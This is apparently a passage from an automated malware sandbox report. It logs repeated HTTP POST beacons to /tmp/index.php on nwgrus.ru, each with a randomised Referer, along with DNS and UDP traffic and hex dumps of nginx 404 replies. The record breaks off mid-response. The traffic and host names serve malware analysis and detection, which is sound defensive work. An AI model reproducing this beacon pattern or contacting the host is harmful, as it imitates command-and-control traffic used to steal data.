Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://clxaxfnyuedfqps.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uimdgsgyvhhaem.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eeyuetrukjpircst.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ydaciekeaeuaol.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://voyqfwrggnp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://blxnotvrjvnu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fplvqqohjqdma.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rdjriakbylriblg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sgyfmqyxpkmdbygm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eyrnjiqpamojnvp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rlfugmueckmpbf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hykquqealhec.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wcfowkxogmtykxos.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mxgxdupfkhdkpgcd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wrowxfwdtnqpxb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://shukyhyxsnyt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oytavkgbvwgngwdq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qcthmhytlnkrqkwa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://irmipcatkrgbgkn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cxjsppdhykfhkdy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wmcfxulhyyb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nhfvlqknfjyv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kdpqwaweroenq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qymlmmmarfrlf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sjchoqywbhy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lfpsmslcgfbr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vpqrqumkciggjbf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yprnusgmnhodqa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hwgseaeonxo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lxdpanclboemkjpp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: nwgrus.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: nwgrus.ru

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxrdkpxlrlca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: nwgrus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the 